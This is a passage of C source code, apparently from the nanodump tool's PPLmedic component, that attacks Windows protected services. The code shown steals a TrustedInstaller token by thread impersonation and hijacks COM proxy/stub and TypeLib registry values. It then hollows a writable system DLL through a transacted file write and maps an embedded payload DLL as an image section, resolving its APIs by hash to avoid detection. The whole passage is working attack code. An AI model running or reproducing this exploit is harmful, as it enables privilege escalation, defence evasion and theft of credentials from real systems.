        0);
    if (!CreateEventW)
    {
        api_not_found("CreateEventW");
        goto cleanup;
    }

    ProxyStubDllLoadEventName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!ProxyStubDllLoadEventName)
    {
        malloc_failed();
        goto cleanup;
    }

    swprintf_s(ProxyStubDllLoadEventName, MAX_PATH, L"Global\\%ws", event_name);

    *ProxyStubDllLoadEventHandle = CreateEventW(NULL, TRUE, FALSE, ProxyStubDllLoadEventName);
    if (!*ProxyStubDllLoadEventHandle)
    {
        function_failed("CreateEventW");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (ProxyStubDllLoadEventName)
        intFree(ProxyStubDllLoadEventName);

    return ret_val;
}

BOOL delete_type_lib(
    IN LPWSTR TypeLibPath)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;

    DeleteFileW_t DeleteFileW = NULL;

    DeleteFileW = (DeleteFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        DeleteFileW_SW2_HASH,
        0);
    if (!DeleteFileW)
    {
        api_not_found("DeleteFileW");
        goto cleanup;
    }

    success = DeleteFileW(TypeLibPath);
    if (!success)
    {
        function_failed("DeleteFileW");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:

    if (!ret_val)
    {
        DPRINT_ERR("Failed to delete custom TypeLib file: %ls", TypeLibPath);
    }

    return ret_val;
}

BOOL unlock_plugin_dll(
    IN HANDLE WaaSMedicCapsuleHandle)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;

    UnlockFile_t UnlockFile = NULL;

    if (!WaaSMedicCapsuleHandle)
        return TRUE;

    UnlockFile = (UnlockFile_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        UnlockFile_SW2_HASH,
        0);
    if (!UnlockFile)
    {
        api_not_found("UnlockFile");
        goto cleanup;
    }

    success = UnlockFile(WaaSMedicCapsuleHandle, 0, 0, 4096, 0);
    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (!ret_val)
    {
        DPRINT_ERR("Failed to unlock Plugin DLL");
    }

    return ret_val;
}

VOID free_directory_list(
    IN PFILE_LIST head)
{
    PFILE_LIST elem = NULL;

    elem = head;
    while (elem)
    {
        head = elem->Next;
        intFree(elem);
        elem = head;
    }
}

BOOL cleanup_temp_directories(
    IN PFILE_LIST TemporaryDiretoriesBefore,
    IN PFILE_LIST TemporaryDiretoriesAfter)
{
    BOOL       ret_val             = FALSE;
    BOOL       success             = FALSE;
    LPWSTR     pwszDirectoryPath   = NULL;
    LPWSTR     pwszWindowsTempPath = NULL;
    PFILE_LIST elem_before         = NULL;
    PFILE_LIST elem_after          = NULL;
    ULONG32    dirs_to_delete      = 0;

    if (!TemporaryDiretoriesAfter)
        goto cleanup;

    success = get_windows_temp_directory(&pwszWindowsTempPath);
    if (!success)
        goto cleanup;

    pwszDirectoryPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszDirectoryPath)
    {
        malloc_failed();
        goto cleanup;
    }

    elem_after = TemporaryDiretoriesAfter;

    while (elem_after)
    {
        elem_after->Existed = FALSE;
        elem_before = TemporaryDiretoriesBefore;
        while (elem_before)
        {
            if (!wcscmp(elem_after->FileName, elem_before->FileName))
            {
                elem_after->Existed = TRUE;
                break;
            }
            elem_before = elem_before->Next;
        }

        if (!elem_after->Existed)
            dirs_to_delete++;

        elem_after = elem_after->Next;
    }

    if (dirs_to_delete > 0)
    {
        DPRINT("Deleting %d temporary directories created by the service...", dirs_to_delete);

        elem_after = TemporaryDiretoriesAfter;

        while (elem_after)
        {
            if (!elem_after->Existed)
            {
                swprintf_s(pwszDirectoryPath, MAX_PATH, L"%ws\\%ws", pwszWindowsTempPath, elem_after->FileName);

                if (!delete_directory(pwszDirectoryPath))
                {
                    ret_val = FALSE;
                }
            }

            elem_after = elem_after->Next;
        }
    }

cleanup:
    safe_free((PVOID*)&pwszWindowsTempPath);
    safe_free((PVOID*)&pwszDirectoryPath);

    return ret_val;
}

BOOL is_proxy_stub_dll_loaded(
    IN HANDLE ProxyStubDllLoadEventHandle)
{
    WaitForSingleObject_t WaitForSingleObject = NULL;

    WaitForSingleObject = (WaitForSingleObject_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        WaitForSingleObject_SW2_HASH,
        0);
    if (!WaitForSingleObject)
    {
        api_not_found("WaitForSingleObject");
        return FALSE;
    }

    return WaitForSingleObject(ProxyStubDllLoadEventHandle, 0) == WAIT_OBJECT_0;
}

BOOL enumerate_temporary_directories(
    OUT PFILE_LIST* pfile_list)
{
    BOOL             ret_val           = FALSE;
    BOOL             success           = FALSE;
    WIN32_FIND_DATAW FindData          = { 0 };
    LPWSTR           pwszSearchPattern = NULL;
    HANDLE           hFind             = NULL;
    PFILE_LIST       file_list         = NULL;
    PFILE_LIST       current_file      = NULL;

    FindFirstFileW_t FindFirstFileW = NULL;
    FindNextFileW_t  FindNextFileW  = NULL;
    FindClose_t      FindClose      = NULL;

    FindFirstFileW = (FindFirstFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindFirstFileW_SW2_HASH,
        0);
    if (!FindFirstFileW)
    {
        api_not_found("FindFirstFileW");
        goto cleanup;
    }

    FindNextFileW = (FindNextFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindNextFileW_SW2_HASH,
        0);
    if (!FindNextFileW)
    {
        api_not_found("FindNextFileW");
        goto cleanup;
    }

    FindClose = (FindClose_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        FindClose_SW2_HASH,
        0);
    if (!FindClose)
    {
        api_not_found("FindClose");
        goto cleanup;
    }

    if (!pfile_list)
        return FALSE;

    *pfile_list = NULL;

    success = get_windows_temp_directory(&pwszSearchPattern);
    if (!success)
        goto cleanup;

    swprintf_s(pwszSearchPattern, MAX_PATH, L"%ws\\%ws", pwszSearchPattern, L"_????????-????-????-????-????????????");

    if ((hFind = FindFirstFileW(pwszSearchPattern, &FindData)) == INVALID_HANDLE_VALUE)
    {
        if (GetLastError() == ERROR_FILE_NOT_FOUND)
            ret_val = TRUE;
        else
        {
            function_failed("FindFirstFileW");
        }

        goto cleanup;
    }

    do
    {
        current_file = intAlloc(sizeof(FILE_LIST));
        if (!current_file)
        {
            malloc_failed();
            goto cleanup;
        }

        current_file->Next = file_list;
        file_list          = current_file;

        swprintf_s(current_file->FileName, MAX_PATH, L"%ws", FindData.cFileName);
        //DPRINT("current_file->FileName: %ls", current_file->FileName);

    } while (FindNextFileW(hFind, &FindData));

    *pfile_list = file_list;

    ret_val = TRUE;

cleanup:
    if (!ret_val)
    {
        DPRINT_ERR("Failed to enumerate temp directory: %ls", pwszSearchPattern);
    }

    if (hFind && hFind != INVALID_HANDLE_VALUE) FindClose(hFind);
    safe_free((PVOID*)&pwszSearchPattern);

    return ret_val;
}

BOOL get_waa_s_medic_capsule_path(
    IN LPWSTR* WaaSMedicCapsulePath)
{
    BOOL   ret_val        = FALSE;
    BOOL   success        = FALSE;
    LPWSTR pwszModulePath = NULL;

    GetSystemDirectoryW_t  GetSystemDirectoryW  = NULL;
    GetWindowsDirectoryW_t GetWindowsDirectoryW = NULL;
    GetFileAttributesW_t   GetFileAttributesW   = NULL;

    GetSystemDirectoryW = (GetSystemDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetSystemDirectoryW_SW2_HASH,
        0);
    if (!GetSystemDirectoryW)
    {
        api_not_found("GetSystemDirectoryW");
        goto cleanup;
    }

    GetWindowsDirectoryW = (GetWindowsDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetWindowsDirectoryW_SW2_HASH,
        0);
    if (!GetWindowsDirectoryW)
    {
        api_not_found("GetWindowsDirectoryW");
        goto cleanup;
    }

    GetFileAttributesW = (GetFileAttributesW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetFileAttributesW_SW2_HASH,
        0);
    if (!GetFileAttributesW)
    {
        api_not_found("GetFileAttributesW");
        goto cleanup;
    }

    //
    // Path on Windows 10: c:\windows\System32\WaaSMedicCapsule.dll
    // Path on Windows 11: c:\windows\UUS\amd64\WaaSMedicCapsule.dll
    //

    *WaaSMedicCapsulePath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!*WaaSMedicCapsulePath)
    {
        malloc_failed();
        goto cleanup;
    }

    pwszModulePath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszModulePath)
    {
        malloc_failed();
        goto cleanup;
    }

    success = GetSystemDirectoryW(pwszModulePath, MAX_PATH);
    if (!success)
    {
        function_failed("GetSystemDirectoryW");
        goto cleanup;
    }

    swprintf_s(pwszModulePath, MAX_PATH, L"%ws\\%ws", pwszModulePath, STR_WAASMEDIC_CAPSULE);

    if ((GetFileAttributesW(pwszModulePath) == INVALID_FILE_ATTRIBUTES) && (GetLastError() == ERROR_FILE_NOT_FOUND))
    {
        success = GetWindowsDirectoryW(pwszModulePath, MAX_PATH);
        if (!success)
        {
            function_failed("GetWindowsDirectoryW");
            goto cleanup;
        }

        swprintf_s(pwszModulePath, MAX_PATH, L"%ws\\UUS\\amd64\\%ws", pwszModulePath, STR_WAASMEDIC_CAPSULE);

        if ((GetFileAttributesW(pwszModulePath) == INVALID_FILE_ATTRIBUTES) && (GetLastError() == ERROR_FILE_NOT_FOUND))
        {
            DPRINT_ERR("Failed to determine file path for file: %ls", STR_WAASMEDIC_CAPSULE);
            goto cleanup;
        }
    }

    swprintf_s(*WaaSMedicCapsulePath, MAX_PATH, L"%ws", pwszModulePath);
    ret_val = TRUE;

cleanup:
    safe_free((PVOID*)&pwszModulePath);

    return ret_val;
}

BOOL lock_plugin_dll(
    IN LPWSTR WaaSMedicCapsulePath,
    IN OUT PBOOL StatePluginDllLocked,
    OUT PHANDLE WaaSMedicCapsuleHandle)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;

    CreateFileW_t CreateFileW  = NULL;
    LockFile_t    LockFile     = NULL;

    CreateFileW = (CreateFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateFileW_SW2_HASH,
        0);
    if (!CreateFileW)
    {
        api_not_found("CreateFileW");
        goto cleanup;
    }

    LockFile = (LockFile_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        LockFile_SW2_HASH,
        0);
    if (!LockFile)
    {
        api_not_found("LockFile");
        goto cleanup;
    }

    if (!*StatePluginDllLocked)
    {
        *WaaSMedicCapsuleHandle = CreateFileW(WaaSMedicCapsulePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (*WaaSMedicCapsuleHandle == INVALID_HANDLE_VALUE)
        {
            function_failed("CreateFileW");
            goto cleanup;
        }
        
        success = LockFile(*WaaSMedicCapsuleHandle, 0, 0, 4096, 0);
        if (!success)
        {
            function_failed("LockFile");
            goto cleanup;
        }

        *StatePluginDllLocked = TRUE;
    }

    ret_val = TRUE;

cleanup:
    if (ret_val)
    {
        DPRINT("Lock: %d", *StatePluginDllLocked);
    }

    return ret_val;
}

BOOL find_proxy_stub_registry_value_path(
    OUT LPWSTR* ProxyStubRegistryValuePath)
{
    BOOL       ret_val            = FALSE;
    BOOL       success            = FALSE;
    LPWSTR     pwszRegPath        = NULL;
    LPWSTR     pwszProxyStubClsid = NULL;
    RPC_WSTR   InterfaceGuidStr   = NULL;
    UUID       InterfaceGuid      = IID_TASKHANDLER;
    RPC_STATUS rpc_status         = RPC_S_OK;

    UuidToStringW_t  UuidToStringW  = NULL;
    RpcStringFreeW_t RpcStringFreeW = NULL;

    UuidToStringW = (UuidToStringW_t)(ULONG_PTR)get_function_address(
        get_library_address(RPCRT4_DLL, TRUE),
        UuidToStringW_SW2_HASH,
        0);
    if (!UuidToStringW)
    {
        api_not_found("UuidToStringW");
        goto cleanup;
    }

    RpcStringFreeW = (RpcStringFreeW_t)(ULONG_PTR)get_function_address(
        get_library_address(RPCRT4_DLL, TRUE),
        RpcStringFreeW_SW2_HASH,
        0);
    if (!RpcStringFreeW)
    {
        api_not_found("RpcStringFreeW");
        goto cleanup;
    }

    //
    // HKLM\SOFTWARE\Classes\Interface\{839D7762-5121-4009-9234-4F0D19394F04}\ProxyStubClsid32
    //      (Default) -> {9C86F320-DEE3-4DD1-B972-A303F26B061E}
    // HKLM\SOFTWARE\Classes\CLSID\{9C86F320-DEE3-4DD1-B972-A303F26B061E}\InprocServer32
    //      (Default) -> C:\Windows\System32\TaskSchdPS.dll
    //

    *ProxyStubRegistryValuePath = intAlloc(MAX_PATH + 1);
    if (!*ProxyStubRegistryValuePath)
    {
        malloc_failed();
        goto cleanup;
    }

    pwszRegPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszRegPath)
    {
        malloc_failed();
        goto cleanup;
    }

    rpc_status = UuidToStringW(&InterfaceGuid, &InterfaceGuidStr);
    if (rpc_status != RPC_S_OK)
    {
        function_failed("UuidToStringW");
        goto cleanup;
    }

    swprintf_s(pwszRegPath, MAX_PATH, L"SOFTWARE\\Classes\\Interface\\{%ws}\\ProxyStubClsid32", (LPWSTR)InterfaceGuidStr);

    success = get_registry_string_value(HKEY_LOCAL_MACHINE, pwszRegPath, NULL, &pwszProxyStubClsid);
    if (!success)
        goto cleanup;

    swprintf_s(*ProxyStubRegistryValuePath, MAX_PATH, L"SOFTWARE\\Classes\\CLSID\\%ws\\InprocServer32", pwszProxyStubClsid);

    ret_val = TRUE;

cleanup:
    if (InterfaceGuidStr) RpcStringFreeW(&InterfaceGuidStr);
    safe_free((PVOID*)&pwszProxyStubClsid);
    safe_free((PVOID*)&pwszRegPath);

    return ret_val;
}

BOOL get_proxy_stub_orig_path(
    IN LPWSTR ProxyStubRegValuePath,
    OUT LPWSTR* ProxyStubOrigPath)
{
    BOOL   ret_val           = FALSE;
    BOOL   success           = FALSE;
    LPWSTR pwszProxyStubPath = NULL;

    *ProxyStubOrigPath = intAlloc(MAX_PATH + 1);
    if (!*ProxyStubOrigPath)
    {
        malloc_failed();
        goto cleanup;
    }

    success = get_registry_string_value(HKEY_LOCAL_MACHINE, ProxyStubRegValuePath, NULL, &pwszProxyStubPath);
    if (!success)
        goto cleanup;

    swprintf_s(*ProxyStubOrigPath, MAX_PATH, L"%ws", pwszProxyStubPath);

    ret_val = TRUE;

cleanup:
    safe_free((PVOID*)&pwszProxyStubPath);

    return ret_val;
}

BOOL modify_proxy_stub_registry_value(
    IN HANDLE hTI,
    IN LPWSTR ProxyStubRegValuePath,
    IN LPWSTR HijackedDllName,
    OUT PBOOL StateRegProxyStubModified)
{
    BOOL ret_val       = FALSE;
    BOOL success       = FALSE;
    BOOL bImpersonated = FALSE;

    RevertToSelf_t RevertToSelf = NULL;

    RevertToSelf = (RevertToSelf_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RevertToSelf_SW2_HASH,
        0);
    if (!RevertToSelf)
    {
        api_not_found("RevertToSelf");
        return FALSE;
    }

    if (StateRegProxyStubModified)
        *StateRegProxyStubModified = FALSE;

    success = impersonate(hTI);
    if (!success)
        goto cleanup;
    bImpersonated = TRUE;

    success = set_registry_string_value(HKEY_LOCAL_MACHINE, ProxyStubRegValuePath, NULL, HijackedDllName);
    if (!success)
        goto cleanup;

    if (StateRegProxyStubModified)
        *StateRegProxyStubModified = TRUE;

    ret_val = TRUE;

cleanup:
    if (bImpersonated) RevertToSelf();
    if (!ret_val)
    {
        DPRINT_ERR("Failed to write Proxy/Stub DLL to registry: %ls", ProxyStubRegValuePath);
    }

    return ret_val;
}

BOOL create_dummy_dll_file(
    IN LPWSTR HijackedDllName,
    OUT PHANDLE DummyDllFileHandle)
{
    BOOL   ret_val      = FALSE;
    BOOL   success      = FALSE;
    LPWSTR pwszFilePath = NULL;
    HANDLE hFile        = NULL;

    CreateFileW_t          CreateFileW          = NULL;
    GetWindowsDirectoryW_t GetWindowsDirectoryW = NULL;

    CreateFileW = (CreateFileW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateFileW_SW2_HASH,
        0);
    if (!CreateFileW)
    {
        api_not_found("CreateFileW");
        goto cleanup;
    }

    GetWindowsDirectoryW = (GetWindowsDirectoryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetWindowsDirectoryW_SW2_HASH,
        0);
    if (!GetWindowsDirectoryW)
    {
        api_not_found("GetWindowsDirectoryW");
        goto cleanup;
    }

    pwszFilePath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszFilePath)
    {
        malloc_failed();
        goto cleanup;
    }

    success = GetWindowsDirectoryW(pwszFilePath, MAX_PATH);
    if (!success)
    {
        function_failed("GetWindowsDirectoryW");
        goto cleanup;
    }

    if (wcslen(pwszFilePath) < 2)
        goto cleanup;

    pwszFilePath[2] = L'\0';
    swprintf_s(pwszFilePath, MAX_PATH, L"%ws\\%ws", pwszFilePath, HijackedDllName);

    //
    // Be careful here, the loader will try to open the file with Read+Delete share mode. So, we must
    // not request write access to the file, otherwise the call (on the target service side) will fail
    // with an ERROR_SHARING_VIOLATION error.
    //
    hFile = CreateFileW(
        pwszFilePath,
        GENERIC_READ | DELETE,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        NULL,
        CREATE_ALWAYS,
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE,
        NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        function_failed("CreateFileW");
        goto cleanup;
    }

    
    *DummyDllFileHandle = hFile;
    ret_val = TRUE;

cleanup:
    if (!ret_val)
        safe_close_handle(&hFile);

    safe_free((PVOID*)&pwszFilePath);

    return ret_val;
}

BOOL map_payload_dll(
    IN unsigned char nanodump_ppl_medic_dll[],
    IN unsigned int nanodump_ppl_medic_dll_len,
    IN LPWSTR HijackedDllName,
    IN LPWSTR HijackedDllSectionPath,
    OUT LPWSTR* HollowedDllPath,
    OUT PHANDLE DllSectionHandle)
{
    BOOL              ret_val         = FALSE;
    BOOL              success         = FALSE;
    HANDLE            hTransaction    = NULL;
    HANDLE            hFileTransacted = NULL;
    LPVOID            pDllData        = NULL;
    DWORD             dwDllSize       = 0;
    UNICODE_STRING    SectionName     = { 0 };
    OBJECT_ATTRIBUTES oa              = { 0 };
    NTSTATUS          status          = ERROR_SUCCESS;
    IO_STATUS_BLOCK   IoStatusBlock   = { 0 };

    CreateFileTransactedW_t  CreateFileTransactedW = NULL;

    CreateFileTransactedW = (CreateFileTransactedW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateFileTransactedW_SW2_HASH,
        0);
    if (!CreateFileTransactedW)
    {
        api_not_found("CreateFileTransactedW");
        goto cleanup;
    }

    pDllData  = nanodump_ppl_medic_dll;
    dwDllSize = nanodump_ppl_medic_dll_len;

    success = find_writable_system_dll(dwDllSize, HollowedDllPath);
    if (!success)
    {
        DPRINT_ERR("Could not find a writeable system DLL");
        goto cleanup;
    }

    memset(&oa, 0, sizeof(oa));
    oa.Length = sizeof(oa);

    status = NtCreateTransaction(&hTransaction, TRANSACTION_ALL_ACCESS, &oa, NULL, NULL, 0, 0, 0, NULL, NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateTransaction", status);
        goto cleanup;
    }

    hFileTransacted = CreateFileTransactedW(
        *HollowedDllPath,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL,
        hTransaction,
        NULL,
        NULL);
    if (hFileTransacted == INVALID_HANDLE_VALUE)
    {
        function_failed("CreateFileTransactedW");
        goto cleanup;
    }

    status = NtWriteFile(
        hFileTransacted,
        NULL,
        NULL,
        NULL,
        &IoStatusBlock,
        pDllData,
        dwDllSize,
        NULL,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtWriteFile", status);
        goto cleanup;
    }

    SectionName.Buffer = HijackedDllSectionPath;
    SectionName.Length = (USHORT)wcslen(SectionName.Buffer) * sizeof(WCHAR);
    SectionName.MaximumLength = SectionName.Length + 2;

    InitializeObjectAttributes(&oa, &SectionName, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtCreateSection(
        DllSectionHandle,
        SECTION_ALL_ACCESS,
        &oa,
        NULL,
        PAGE_READONLY,
        SEC_IMAGE,
        hFileTransacted);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateSection", status);
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    safe_close_handle(&hTransaction);
    safe_close_handle(&hFileTransacted);

    if (ret_val)
    {
        DPRINT("Section: %ls (handle: 0x%04x)", HijackedDllSectionPath, (ULONG32)(ULONG_PTR)*DllSectionHandle);
    }

    if (!ret_val)
    {
        DPRINT_ERR("Failed to create section: %ls", HijackedDllSectionPath);
    }

    return ret_val;
}

BOOL get_type_lib_orig_path(
    IN LPWSTR TypeLibRegValuePath,
    OUT LPWSTR* TypeLibOrigPath)
{
    BOOL   ret_val         = FALSE;
    BOOL   success         = FALSE;
    LPWSTR pwszTypeLibPath = NULL;

    *TypeLibOrigPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!*TypeLibOrigPath)
    {
        malloc_failed();
        goto cleanup;
    }

    success = get_registry_string_value(HKEY_LOCAL_MACHINE, TypeLibRegValuePath, NULL, &pwszTypeLibPath);
    if (!success)
        goto cleanup;

    swprintf_s(*TypeLibOrigPath, MAX_PATH, L"%ws", pwszTypeLibPath);

    ret_val = TRUE;

cleanup:
    if (pwszTypeLibPath)
        intFree(pwszTypeLibPath);
    if (!ret_val && *TypeLibOrigPath)
    {
        intFree(*TypeLibOrigPath);
        *TypeLibOrigPath = NULL;
    }

    return ret_val;
}

BOOL get_trusted_installer_token(
    OUT PHANDLE hTI)
{
    //
    // https://www.tiraniddo.dev/2017/08/the-art-of-becoming-trustedinstaller.html
    //

    BOOL                        ret_val        = FALSE;
    BOOL                        success        = FALSE;
    BOOL                        bImpersonation = FALSE;
    DWORD                       dwTiSvcStatus  = 0;
    DWORD                       dwTiSvcPid     = 0;
    HANDLE                      hSnapshot      = INVALID_HANDLE_VALUE;
    HANDLE                      hThread        = NULL;
    THREADENTRY32               ThreadEntry    = { 0 };
    SECURITY_QUALITY_OF_SERVICE Qos            = { 0 };
    NTSTATUS                    status         = STATUS_SUCCESS;
    CLIENT_ID                   cid            = { 0 };
    OBJECT_ATTRIBUTES           obj_attr       = { 0 };
    LPCWSTR ppwszRequiredPrivileges[2] = {
        L"SeDebugPrivilege",
        L"SeImpersonatePrivilege"
    };

    CreateToolhelp32Snapshot_t CreateToolhelp32Snapshot = NULL;
    Thread32First_t            Thread32First            = NULL;
    Thread32Next_t             Thread32Next             = NULL;
    RevertToSelf_t             RevertToSelf             = NULL;

    InitializeObjectAttributes(&obj_attr, NULL, 0, 0, NULL);

    CreateToolhelp32Snapshot = (CreateToolhelp32Snapshot_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateToolhelp32Snapshot_SW2_HASH,
        0);
    if (!CreateToolhelp32Snapshot)
    {
        api_not_found("CreateToolhelp32Snapshot");
        goto cleanup;
    }

    Thread32First = (Thread32First_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        Thread32First_SW2_HASH,
        0);
    if (!Thread32First)
    {
        api_not_found("Thread32First");
        goto cleanup;
    }

    Thread32Next = (Thread32Next_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        Thread32Next_SW2_HASH,
        0);
    if (!Thread32Next)
    {
        api_not_found("Thread32Next");
        goto cleanup;
    }

    RevertToSelf = (RevertToSelf_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RevertToSelf_SW2_HASH,
        0);
    if (!RevertToSelf)
    {
        api_not_found("RevertToSelf");
        return FALSE;
    }

    success = check_token_privileges(
        NULL,
        ppwszRequiredPrivileges,
        ARRAY_SIZE(ppwszRequiredPrivileges),
        TRUE);
    if (!success)
        goto cleanup;

    success = get_service_status_by_name(STR_TI_SVC, &dwTiSvcStatus);
    if (!success)
        goto cleanup;

    if (dwTiSvcStatus != SERVICE_RUNNING)
    {
        DPRINT("Starting service %ls...", STR_TI_SVC);
        success = start_service_by_name(STR_TI_SVC, TRUE);
        if (!success)
            goto cleanup;
    }

    success = get_service_process_id(STR_TI_SVC, &dwTiSvcPid);
    if (!success)
        goto cleanup;

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
        function_failed("CreateToolhelp32Snapshot");
        goto cleanup;
    }

    memset(&ThreadEntry, 0, sizeof(ThreadEntry));
    ThreadEntry.dwSize = sizeof(ThreadEntry);

    success = Thread32First(hSnapshot, &ThreadEntry);
    if (!success)
        goto cleanup;

    do
    {
        if (ThreadEntry.th32OwnerProcessID == dwTiSvcPid)
        {
            // TODO: switch to syscall
            cid.UniqueProcess = (HANDLE)(ULONG_PTR)dwTiSvcPid;
            cid.UniqueThread  = (HANDLE)(ULONG_PTR)ThreadEntry.th32ThreadID;

            status = NtOpenThread(
                &hThread,
                THREAD_DIRECT_IMPERSONATION,
                &obj_attr,
                &cid);
            if (!NT_SUCCESS(status))
            {
                syscall_failed("NtOpenThread", status);
                hThread = NULL;
            }
            else
            {
                break;
            }
        }

    } while (Thread32Next(hSnapshot, &ThreadEntry));

    if (!hThread)
    {
        DPRINT_ERR("Failed to find a thread handle");
        goto cleanup;
    }

    memset(&Qos, 0, sizeof(Qos));
    Qos.Length = sizeof(Qos);
    Qos.ImpersonationLevel = SecurityImpersonation;

    status = NtImpersonateThread(NtGetCurrentThread(), hThread, &Qos);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtImpersonateThread", status);
        goto cleanup;
    }

    bImpersonation = TRUE;

    status = NtOpenThreadToken(
        NtGetCurrentThread(),
        TOKEN_IMPERSONATE,
        FALSE,
        hTI);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenThreadToken", status);
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    if (bImpersonation)
        RevertToSelf();
    if (hThread)
        NtClose(hThread);
    if (hSnapshot)
        NtClose(hSnapshot);

    return ret_val;
}

BOOL modify_type_lib_registry_value(
    IN LPWSTR TypeLibPath,
    IN LPWSTR TypeLibRegValuePath,
    IN HANDLE hTI,
    OUT PBOOL StateRegTypeLibModified)
{
    BOOL ret_val       = FALSE;
    BOOL success       = FALSE;
    BOOL bImpersonated = FALSE;

    RevertToSelf_t RevertToSelf = NULL;

    RevertToSelf = (RevertToSelf_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RevertToSelf_SW2_HASH,
        0);
    if (!RevertToSelf)
    {
        api_not_found("RevertToSelf");
        return FALSE;
    }

    if(StateRegTypeLibModified)
        *StateRegTypeLibModified = FALSE;

    success = impersonate(hTI);
    if (!success)
        goto cleanup;

    bImpersonated = TRUE;

    success = set_registry_string_value(HKEY_LOCAL_MACHINE, TypeLibRegValuePath, NULL, TypeLibPath);
    if (!success)
        goto cleanup;

    if(StateRegTypeLibModified)
        *StateRegTypeLibModified = TRUE;

    ret_val = TRUE;

cleanup:
    if (bImpersonated)
        RevertToSelf();

    return ret_val;
}

BOOL write_type_lib(
    IN LPWSTR TypeLibPath)
{
    BOOL ret_val = FALSE;

    HRESULT hr = S_OK;
    UINT i, j, cNames;

    ITypeLib*  TypeLibOrig   = NULL;
    ITypeInfo* TypeInfoOrig  = NULL;
    TLIBATTR*  pTLibAttrOrig = NULL;
    TYPEATTR*  pTypeAttrOrig = NULL;
    FUNCDESC*  pFuncDescOrig = NULL;
    BSTR       TypeLibName   = NULL;

    //ITypeLib*  TypeLibRef  = NULL;
    ITypeInfo* TypeInfoRef = NULL;
    HREFTYPE   hRefType;
    BSTR       Names[8];

    ICreateTypeLib2* TypeLibNew   = NULL;
    ICreateTypeInfo* TypeInfoNew  = NULL;
    ICreateTypeInfo* TypeInfoNew2 = NULL;
    ELEMDESC         ldoParams[2];
    ELEMDESC         lroParams[3];

    UUID InterfaceGuid1 = IID_WAASREMEDIATIONEX;
    UUID InterfaceGuid2 = IID_TASKHANDLER;

    LoadTypeLib_t    LoadTypeLib    = NULL;
    CreateTypeLib2_t CreateTypeLib2 = NULL;
    SysAllocString_t SysAllocString = NULL;
    SysFreeString_t  SysFreeString  = NULL;

    LoadTypeLib = (LoadTypeLib_t)(ULONG_PTR)get_function_address(
        get_library_address(OLEAUT32_DLL, TRUE),
        LoadTypeLib_SW2_HASH,
        0);
    if (!LoadTypeLib)
    {
        api_not_found("LoadTypeLib");
        goto cleanup;
    }

    CreateTypeLib2 = (CreateTypeLib2_t)(ULONG_PTR)get_function_address(
        get_library_address(OLEAUT32_DLL, TRUE),
        CreateTypeLib2_SW2_HASH,
        0);
    if (!CreateTypeLib2)
    {
        api_not_found("CreateTypeLib2");
        goto cleanup;
    }

    SysAllocString = (SysAllocString_t)(ULONG_PTR)get_function_address(
        get_library_address(OLEAUT32_DLL, TRUE),
        SysAllocString_SW2_HASH,
        0);
    if (!SysAllocString)
    {
        api_not_found("SysAllocString");
        goto cleanup;
    }

